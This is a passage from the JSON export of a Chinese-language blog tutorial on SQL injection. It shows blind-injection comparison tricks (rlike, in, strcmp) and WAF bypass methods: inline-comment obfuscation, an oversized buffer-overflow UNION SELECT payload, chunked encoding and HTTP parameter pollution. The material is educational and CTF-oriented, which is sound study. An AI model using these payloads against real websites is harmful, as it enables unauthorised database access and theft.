&#8216;\u5927$&#8217;<br><br><strong>5\u3001\u6a21\u7cca\u5339\u914d\u6216\u5173\u7cfb\uff0c\u53c8\u79f0\u5206\u652f\u6761\u4ef6\u3002<\/strong><br>\u5982\uff1a\u67e5\u8be2\u51fa\u5b57\u6bb5\u4e2d\u5305\u542b\u201c\u5e78\u798f\uff0c\u5e78\u8fd0\uff0c\u5e78\u597d\u6216\u5e78\u4e8f\u201d\u7684\u4fe1\u606f\uff1a<br>select * from student where name  rlike &#8216;\u5e78\u798f|\u5e78\u8fd0|\u5e78\u597d|\u5e78\u4e8f&#8217;<\/p>\n<\/blockquote>\n\n\n\n<p>\u6240\u4ee5\u8fd8\u662f\u8fd9\u4e2a\u53e5\u5b50\uff1a<code>SELECT * FROM `test` where id =1 and (substr(database(),1,1)=\"t\")<\/code>\uff0c\u6211\u4eec\u6362\u6210rlike\u6216\u8005regexp\u5c31\u53ef\u7b49\u6548\u4e3a\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>SELECT * FROM `test` where id =1 and (database() rlike \"^t\")<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">in<\/h2>\n\n\n\n<p>\u6211\u4eec\u53ef\u4ee5\u628a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select * from sheet1 where \u7528\u6237\u540d=\"admin\" and substr(user(),1,1) ='r'<\/code><\/pre>\n\n\n\n<p>\u66ff\u6362\u6210<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select * from sheet1 where \u7528\u6237\u540d=\"admin\" and substr(user(),1,1) in ('r')<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">strcmp()<\/h2>\n\n\n\n<p>strcmp(str1,str2):\u82e5str1&gt;str2\u5219\u8fd4\u56de1\uff0c\u82e5str1=str2\u5219\u8fd4\u56de0\uff0c\u82e5str1&lt;str2\u5219\u8fd4\u56de-1\uff0c\u56e0\u6b64\u8bed\u53e5select * from sheet1 where \u7528\u6237\u540d=&#8221;admin&#8221; and ascii(substr(database(),0,1))=116\u53ef\u4ee5\u7b49\u6548\u66ff\u6362\u6210\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select * from sheet1 where \u7528\u6237\u540d=\"admin\" and strcmp(ascii(substr(database(),1,1)),116)<\/code><\/pre>\n\n\n\n<p>\u53ea\u6709ascii(substr(database(),1,1))\u548c116\u76f8\u7b49\u8fd9\u4e2a\u8bed\u53e5\u624d\u4e0d\u4f1a\u6267\u884c\uff0c\u4ee5\u6b64\u5224\u65ad\u662f\u5426\u76f8\u7b49<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">4.\u7ed5waf<\/h1>\n\n\n\n<h1 class=\"wp-block-heading\">\u5185\u8054\u6ce8\u91ca<\/h1>\n\n\n\n<p>\u6211\u4eec\u90fd\u77e5\u9053mysql\u91cc\u53ef\u4ee5\u7528\/**\/\u4f5c\u4e3a\u6ce8\u91ca\u7b26\u4ee3\u66ff\u7a7a\u683c\uff0c\u4e8b\u5b9e\u4e0a\u9664\u4e86\u8fd9\u79cd\u6ce8\u91ca\u7b26\u8fd8\u6709\u4e00\u79cd\u6ce8\u91ca\u7b26\u53eb\u5185\u8054\u6ce8\u91ca\uff0c\u6bd4\u5982\/*!\u5b57\u7b26\u4e32*\/\uff0c<strong>\u800c\u7ecf\u8fc7\u5185\u8054\u6ce8\u91ca\u7684\u8bed\u53e5\u8fd8\u662f\u53ef\u4ee5\u6267\u884c\u7684<\/strong>\uff01\u6bd4\u5982\u8fd9\u4e2a\u8bed\u53e5\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>select group_concat(table_name) from information_schema.tables where table_schema = database()<\/code><\/pre>\n\n\n\n<p>\u4ed6\u7684\u4f5c\u7528\u662f\u67e5\u8868\uff0c\u4e0d\u7528\u8d58\u8ff0\uff0c\u6211\u4eec\u53ef\u4ee5\u628a\u5b83\u4fee\u6539\u6210\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>sEleCt \/*!group_concat(table_name)*\/ FrOM \/*!information_schema.tables*\/ WHERE TaBlE_ScHeMa=\/*%!\"\/*\/database\/*%!\"\/*\/() <\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-25-1024x208.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"208\" data-original=\"https:\/\/fushuling-1309926051.cos.ap-shanghai.myqcloud.com\/2023\/04\/1-25-1024x208.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-1481\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u8fd9\u91cc\u6211\u4eec\u5bf9group_concat(table_name)\u548cinformation_schema.tables\u90fd\u6253\u4e0a\u4e86\u5185\u8054\u6ce8\u91ca\/*!*\/\uff0c\u5e76\u4e14\u628adatabase()\u6539\u6210\u4e86database\/*%!&#8221;\/*\/()\uff0c\u5bf9\u4e8e\u4e00\u4e9b\u6bd4\u8f83\u4f4e\u80fd\u7684waf\u53ef\u4ee5\u7528\u8fd9\u79cdpayload\u6210\u529f\u7ed5\u8fc7<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">\u7f13\u51b2\u533a\u6ea2\u51fa<\/h1>\n\n\n\n<p>\u5927\u90e8\u5206\u9632\u706b\u5899\u90fd\u662f\u57fa\u4e8eC\/C++\u5f00\u53d1\u7684\uff0c\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528\u7f13\u51b2\u533a\u6ea2\u51fa\u4f7f\u7528WAF\u5d29\u6e83<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>http:\/\/www.*.com\/index.php?page_id=-15+and+(select1)=(Select 0xAA&#91;..(add about 1000 \"A\")..])+\/*!uNIOn*\/+\/*!SeLECt*\/+1,2,3,4\u2026.<\/code><\/pre>\n\n\n\n<p>\u6211\u4eec\u53ef\u4ee5\u4f7f\u7528\u6d4b\u8bd5payload\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>?page_id=null%0A\/**\/\/*!50000%55nIOn*\/\/*yoyu*\/all\/**\/%0A\/*!%53eLEct*\/%0A\/*nnaa*\/+1,2,3,4\u2026.<\/code><\/pre>\n\n\n\n<p>\u5982\u679c\u4ea7\u751f\u62a5\u9519\u4e00\u822c\u5c31\u8bc1\u660e\u53ef\u4ee5\u7528\u8fd9\u79cd\u65b9\u6cd5\u3002\u5f53\u7136\u7f13\u51b2\u533a\u6ea2\u51fa\u4e5f\u53ef\u4ee5\u7528\u4e8e\u4ea7\u751f\u5e03\u5c14\u6761\u4ef6\u7684\u62a5\u9519\u6761\u4ef6\uff0c\u5982\u864e\u7b26ezsql\u90a3\u9053\u9898\u5b9e\u9645\u4e0a\u5c31\u8fd8\u53ef\u4ee5\u7528\u5927\u91cfA\u6784\u9020\u810f\u6570\u636e\u6784\u9020\u62a5\u9519\u6761\u4ef6\u3002<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">\u5206\u5757\u4f20\u8f93<\/h1>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>\u5206\u5757\u4f20\u8f93\u7f16\u7801\uff08Chunked transfer encoding\uff09\u662fHTTP\u4e2d\u7684\u4e00\u79cd\u6570\u636e\u4f20\u8f93\u673a\u5236\uff0c\u5728HTTP\/1.1\u4e2d\uff0c\u670d\u52a1\u5668\u53d1\u9001\u7ed9\u5ba2\u6237\u7aef\u7684\u6570\u636e\u53ef\u4ee5\u5206\u6210\u591a\u4e2a\u90e8\u5206\uff0c\u5728HTTP\/1.1\u524d\uff0c\u6570\u636e\u7684\u53d1\u9001\u662f\u7531<code>Content-Length<\/code>\u53bb\u51b3\u5b9a\u7684\uff0c\u5b83\u89c4\u5b9a\u4e86\u4e00\u4e2a\u5305\u7684\u957f\u5ea6\uff0c\u670d\u52a1\u5668\u4e5f\u662f\u6309\u7167\u8fd9\u4e2a\u53bb\u8fdb\u884c\u5904\u7406\u7684\u3002\u4f46\u662f\uff0c\u4f7f\u7528\u5206\u5757\u4f20\u8f93\u7684\u65f6\u5019\uff0c\u6570\u636e\u4f1a\u88ab\u5206\u89e3\u51fa\u4e00\u4e2a\u4e2a\u5c0f\u5757\uff0c\u8fd9\u6837\u670d\u52a1\u5668\u5c31\u4e0d\u9700\u8981\u9884\u5148\u77e5\u9053\u603b\u6570\u636e\u7684\u5927\u6982\u957f\u5ea6\uff0c\u63a5\u6536\u5230\u4e00\u4e2a\u4e2a\u5757\u8fdb\u884c\u5904\u7406\u5c31\u884c\u4e86\u3002<br>\u6b63\u5e38\u6211\u4eec\u53d1\u9001\u5f88\u5c0f\u7684\u6570\u636e\u662f\u4e0d\u9700\u8981\u7528\u5230\u5206\u5757\u6280\u672f\u7684\uff0c\u800c\u4e0b\u8f7d\u5927\u6587\u4ef6\uff0c\u6216\u8005\u53d1\u9001\u4e00\u4e9b\u540e\u53f0\u9700\u8981\u5f88\u590d\u6742\u7684\u903b\u8f91\u624d\u80fd\u5904\u7406\u7684\u8bf7\u6c42\u7684\u65f6\u5019\uff0c\u5c31\u9700\u8981\u5b9e\u65f6\u751f\u6210\u6d88\u606f\u957f\u5ea6\uff0c\u670d\u52a1\u5668\u4e00\u822c\u4f1a\u4f7f\u7528Chunked\u7f16\u7801\u3002\u5728\u8fdb\u884c<code>Chunked<\/code>\u7f16\u7801\u8fdb\u884c\u4f20\u8f93\u7684\u65f6\u5019\uff0c\u54cd\u5e94\u5934\u4f1a\u6709<code>Transfer-Encoding: Chunked<\/code>\uff0c\u53bb\u8868\u660e\u662f\u4f7f\u7528Chunked\u7f16\u7801\u4f20\u8f93\u5185\u5bb9\u7684\u3002\u5206\u5757\u6280\u672f\u7684\u5177\u4f53\u8fc7\u7a0b\u5c31\u662f\uff0c\u5b9e\u4f53\u76f4\u63a5\u88ab\u5206\u5272\u6210\u591a\u4e2a\u5757\uff0c\u5373\u662f\u5e94\u7528\u5c42\u7684\u6570\u636e\u5728TCP\u4f20\u8f93\u7684\u8fc7\u7a0b\u4e2d\uff0c\u4e0d\u4f5c\u4efb\u4f55\u89e3\u91ca\uff0c\u5168\u90e8\u7406\u89e3\u6210\u4e8c\u8fdb\u5236\u6d41\uff0c\u7136\u540e\u6309\u7167MSS\u7684\u957f\u5ea6\u5207\u5206\uff0c\u7136\u540e\u4e00\u8d77\u538b\u5230TCP\u534f\u8bae\u6808\u91cc\u9762\uff0c\u5269\u4e0b\u7684\u5bf9\u8fd9\u4e9b\u4e8c\u8fdb\u5236\u6570\u636e\u7684\u5177\u4f53\u89e3\u91ca\uff0c\u5219\u4ea4\u7531\u5e94\u7528\u5c42\u89e3\u51b3<\/p>\n<\/blockquote>\n\n\n\n<p>\u53ef\u4ee5\u770b\u770bhttps:\/\/github.com\/c0ny1\/chunked-coding-converter<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">http\u53c2\u6570\u6c61\u67d3<\/h1>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p><code>id=1 union select+1,2,3+from+users+where+id=1\u2013<\/code>\u53d8\u4e3a<code>id=1 union select+1&amp;id=2,3+from+users+where+id=1\u2013<\/code><\/p>\n<\/blockquote>\n","protected":false},"excerpt":{"rendered":"<p>\u524d\u8a00 SQL\u6ce8\u5165\u5411\u6765\u662fWeb\u5c0f\u5b50\u6700\u91cd\u8981\u7684\u57fa\u672c\u6280\u80fd\u4e4b\u4e00\uff0c\u57fa\u672c\u4e0a\u6bcf\u6b21\u9762\u8bd5\u9762\u8bd5\u5b98\u90fd\u4f1a\u95ee\u5230SQL\u6ce8\u5165\u76f8\u5173\u7684\u95ee\u9898\uff0c\u4f46\u611f\u89c9 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8],"tags":[],"class_list":["post-1367","post","type-post","status-publish","format-standard","hentry","category-8"],"_links":{"self":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/1367","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/comments?post=1367"}],"version-history":[{"count":71,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/1367\/revisions"}],"predecessor-version":[{"id":3228,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/1367\/revisions\/3228"}],"wp:attachment":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/media?parent=1367"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/categories?post=1367"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/tags?post=1367"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}